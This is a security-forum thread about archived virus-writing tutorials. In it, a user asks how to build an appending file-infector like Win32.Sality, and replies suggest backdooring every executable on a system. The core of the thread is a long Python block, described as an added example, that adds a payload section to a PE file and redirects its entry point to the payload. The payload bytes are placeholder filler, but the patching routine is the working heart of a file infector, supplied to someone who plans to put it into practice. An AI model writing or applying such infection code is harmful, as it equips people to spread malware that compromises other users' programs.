Windows Keylogging - Part I

Nice article, although only the first paragraph and a link to the original article should be supplied on the main page.

I think I prefer posting onto the forum from now on. You could just modify the one on the front page or remove it entirely.


Great article DTM! I’m sure it’ll help a lot of people out!

This really changed how we do things! The old way was cool! :stuck_out_tongue:

Hello @dtm, I had been reading your Security-Oriented C tutorials since before Null Byte changed their theme. Since they changed the website, your tutorials are lacking some parts, like this article: http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0xf9-spy-with-my-little-program-keylogging-101-0169950/

Not just your tutorials; OccupyTheWeb’s and the others’ articles have the same problem.

Where can I find your full Security-Oriented C tutorials?

I’ve discontinued that series.

@oaktree @unh0lys0da @pry0cc


They were a great series. I want to read everything you’ve written, but not on Null Byte. So do you have Word documents of the series? If yes, can you send them to me please?

I don’t have a back up of them but somebody else might. Which ones were you specifically looking for?

Especially from tutorial 0x0c to the last one. But if someone has a backup of them, I need all of them, because they were absolutely excellent articles. I really liked them.

Thanks for the support, but the series has been concluded. There are no missing articles there, only missing information on the higher-numbered ones.

Thanks for your help.

Hello @dtm
I could find the original articles from the Security-Oriented C series using Archive.org.
And I wanted to ask you a question (sorry if I’m posting this at the wrong place).

In tutorial 0xFE (It lives), I tried to use the append-binary (“ab”) mode instead of the “wb” mode so that the infected file could run itself and then the virus, but only the victim file executed.

Is it related to EOF at the end of the (original) infected file?
How can I make it work, something like Win32.Sality?

Thanks for the series, and I’m eager to see your answer :blush:

I don’t know if he even remembers the exact content of each article. If you can link to the article on archive.org, it might give you a better chance of a reply.

Of course (and thanks for the advice)

Please PM me with Win32.Sality’s code and I will get back to you on the NB article.

Well, by mentioning Sality I just wanted to give an example of a virus which doesn’t overwrite and destroy the victim file but appends to it, and as a result, when you execute the infected victim file, both the victim file and the virus run.

But if you wish I will try to find out exactly how Sality works :slight_smile:

Hmm, this is indeed an interesting concept. You could be mega dirty and just filebind everything. (This would break a lot too, though.)

You might be best off backdooring the program that opens those files, perhaps every executable on the system? Then when you open a text file, command prompt, or a spreadsheet, you are opening the payload too.

Okay, I see what you mean by using mode “ab”, but unfortunately it’s not quite as simple as you think it is.

I’ve already documented a method for this in my paper “PE File Infection” and have done an analysis of a simple appending virus in “Understanding a Win32 Virus: Code Analysis”, with background material in “Understanding a Win32 Virus: Background Material”.

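Why appending with “ab” leaves the host untouched from the loader’s point of view, as an added example that is not code from this thread or from the papers mentioned in it. It constructs a minimal PE32+ image in memory (all byte values are made up; only the offsets follow the PE/COFF header layout), appends a placeholder payload the way fopen("ab") plus fwrite would, and reads the headers back: AddressOfEntryPoint still points at the host’s code and the appended bytes sit past the last section’s raw data, so the loader never maps them, which is exactly the “only the victim file executed” result reported above. The second function shows the header work an appending infector does instead (a new section holding the payload, the entry point redirected into it, the original entry point kept so the payload can hand control back). The HOST_CODE and PAYLOAD bytes and the .infect section name are assumptions for the demo; the payload is filler, not code that actually jumps back to the host.

```python
import struct

FILE_ALIGN = 0x200
SECT_ALIGN = 0x1000

# Constructed sample bytes (assumption, not from any real binary): 16 x `ret`
# stands in for the host's code, 100 x `nop` for a payload. A real payload
# would end by jumping to the saved original entry point so the host still runs.
HOST_CODE = b"\xC3" * 16
PAYLOAD = b"\x90" * 100


def align(n: int, a: int) -> int:
    return (n + a - 1) & ~(a - 1)


def build_minimal_pe(code: bytes) -> bytes:
    """Construct a tiny PE32+ image with one .text section holding `code`."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF file header: AMD64, one section, 0xF0-byte optional header, EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0xF0, 0x0022)
    size_of_headers = align(e_lfanew + 4 + 20 + 0xF0 + 40, FILE_ALIGN)
    text_rva = SECT_ALIGN
    raw_size = align(len(code), FILE_ALIGN)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)                       # PE32+ magic
    struct.pack_into("<II", opt, 16, text_rva, text_rva)        # AddressOfEntryPoint, BaseOfCode
    struct.pack_into("<Q", opt, 24, 0x140000000)                # ImageBase
    struct.pack_into("<II", opt, 32, SECT_ALIGN, FILE_ALIGN)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, text_rva + align(len(code), SECT_ALIGN), size_of_headers)
    struct.pack_into("<H", opt, 68, 3)                          # Subsystem: console
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), text_rva, raw_size,
                       size_of_headers, 0, 0, 0, 0, 0x60000020)  # CODE|EXECUTE|READ
    img = bytearray(dos + b"PE\0\0" + file_hdr + opt + sect)
    img += b"\0" * (size_of_headers - len(img))
    img += code + b"\0" * (raw_size - len(code))
    return bytes(img)


def parse_pe(img: bytes) -> dict:
    """Read the header fields that decide what gets mapped and where execution starts."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if img[:2] != b"MZ" or img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect = struct.unpack_from("<H", img, e_lfanew + 6)[0]
    opt_off = e_lfanew + 24                       # signature (4) + COFF header (20)
    sect_off = opt_off + struct.unpack_from("<H", img, e_lfanew + 20)[0]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, raw = struct.unpack_from("<8sIIII", img, sect_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "va": va,
                         "rawsize": rawsize, "raw": raw})
    entry, = struct.unpack_from("<I", img, opt_off + 16)
    size_of_image, size_of_headers = struct.unpack_from("<II", img, opt_off + 56)
    return {"e_lfanew": e_lfanew, "opt_off": opt_off, "sect_off": sect_off, "entry": entry,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers, "sections": sections}


def file_offset_is_mapped(img: bytes, offset: int) -> bool:
    """True if the byte at this file offset belongs to the headers or to some section's raw data."""
    pe = parse_pe(img)
    if offset < pe["size_of_headers"]:
        return True
    return any(s["raw"] <= offset < s["raw"] + s["rawsize"] for s in pe["sections"])


def append_like_ab(host: bytes, payload: bytes) -> bytes:
    """Exactly what fopen(host, "ab") followed by fwrite(payload) leaves on disk."""
    return host + payload


def infect_by_new_section(host: bytes, payload: bytes) -> tuple:
    """Put the payload in a new section and redirect the entry point to it.
    Returns (infected_image, original_entry_point); the payload needs the OEP to return control."""
    pe = parse_pe(host)
    last = pe["sections"][-1]
    tbl_end = pe["sect_off"] + 40 * len(pe["sections"])
    if tbl_end + 40 > pe["size_of_headers"]:
        raise ValueError("no room in the header area for another section header")
    new_va = align(last["va"] + last["vsize"], SECT_ALIGN)
    new_raw = align(len(host), FILE_ALIGN)
    raw_size = align(len(payload), FILE_ALIGN)
    img = bytearray(host) + b"\0" * (new_raw - len(host))
    img += payload + b"\0" * (raw_size - len(payload))
    struct.pack_into("<8sIIIIIIHHI", img, tbl_end, b".infect", len(payload), new_va,
                     raw_size, new_raw, 0, 0, 0, 0, 0xE0000020)  # CODE|EXECUTE|READ|WRITE
    struct.pack_into("<H", img, pe["e_lfanew"] + 6, len(pe["sections"]) + 1)   # NumberOfSections
    struct.pack_into("<I", img, pe["opt_off"] + 16, new_va)                     # entry -> payload
    struct.pack_into("<I", img, pe["opt_off"] + 56, align(new_va + len(payload), SECT_ALIGN))
    return bytes(img), pe["entry"]


def demo() -> dict:
    host = build_minimal_pe(HOST_CODE)
    naive = append_like_ab(host, PAYLOAD)
    infected, oep = infect_by_new_section(host, PAYLOAD)
    return {"naive_entry_unchanged": parse_pe(naive)["entry"] == parse_pe(host)["entry"],
            "naive_payload_mapped": file_offset_is_mapped(naive, len(host)),
            "infected_entry": parse_pe(infected)["entry"],
            "infected_payload_mapped": file_offset_is_mapped(infected, len(host)),
            "oep": oep}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The naive case fails for two independent reasons the headers make visible: the entry point is untouched, and the payload’s file offset is past every section’s PointerToRawData + SizeOfRawData, so it is never even loaded into memory. The new-section variant fixes both, but it only works if the header area has 40 spare bytes for another section header, and the payload still has to end by transferring control to the saved original entry point, which is the part the filler bytes here do not do.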

Thank you, both of you. I will study the papers and see if I can put them into practice.
Maybe I would go mega-dirty!
